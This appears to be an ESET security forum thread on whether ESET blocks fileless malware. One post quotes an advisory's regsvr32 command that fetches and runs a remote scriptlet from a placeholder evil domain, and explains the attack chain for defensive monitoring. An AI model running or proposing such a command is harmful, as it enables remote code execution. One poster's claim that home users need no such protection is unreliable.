Jump to content

Does Eset block File-less malware?

Wolf Igmc4

Recommended Posts

Because Eset has memory protection so the answer is yes but it doesn't mean it can detect all of them.
Home products are weak against file less malware and I can say home users never target by file less malware because they are designed to target businesses so you don't need protection against file less malware.
But if you want to have a reliable protection against these attacks then you need Appguard.
APPGUARD+ESET would be a good combo:D

Link to comment
Share on other sites

16 hours ago, TomFace said:

Shop around....depending on your location, watch for sales (especially seasonal ones).

Believe OP was referring to AppGuard. They just recently "jacked up" their yearly subscription costs considerablely. Also you have to agree to auto renewal of the subscription i.e. give credit card details. Thanks but no thanks. 

Link to comment
Share on other sites

  • Administrators
23 hours ago, Wolf Igmc4 said:

That's It, I just don't know if Eset can block It.

Yes, ESET is able to detect fileless malware in the registry. Personally I've come across several cases where REG/something was detected in the registry.

Link to comment
Share on other sites

There are a number of characteristics of fileless malware.

One of them is the use of the Win registry for persistence purposes. This will allow the malware to reload itself at boot time.

However, the established definition of fileless malware is one where the initial attack is performed entirely from memory without every directly downloading anything to the disk. Here is an example of one currently active: https://security.radware.com/ddos-threats-attacks/threat-advisories-attack-reports/codefork-malware/ . As with many of these attacks, the initial infection vector is unknown. In this attack, one example is:


A common infection vector most likely was used against most of the targeted organizations. For example, an email attachment with a Microsoft Office document containing a malicious macro. The infection payload launches the following command:

regsvr32 /s /u /i:http://xxx.somerandomevildomain.xx/evilpath.xml scrobj.dl

I won't get into all the details of the attack other than to discuss the abuse of regsvr32 in this attack. This is an over year old exploit named "squibbedoo" developed by Casey Smith, a security researcher. For starters, it requires admin privileges to run. This implies an escalation of privileges to run; something unfortunately is quite easy to do on Win OSes. What the above command does is establishes a remote connection to the attackers server. Then wscript.exe is run remotely to execute an obfuscated Javascript code that executes Powershell which remotely downloads a PowerShell script and run it from memory. And "we at off and running" as far as the malware attack goes.

As far as I am aware of, Eset's HIPS does not monitor regsvr32 execution. I do with a user created HIPS rule. I additionally monitor any inbound/outbound network traffic from it with a user created Eset firewall rule. 

Edited by itman
Link to comment
Share on other sites

This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...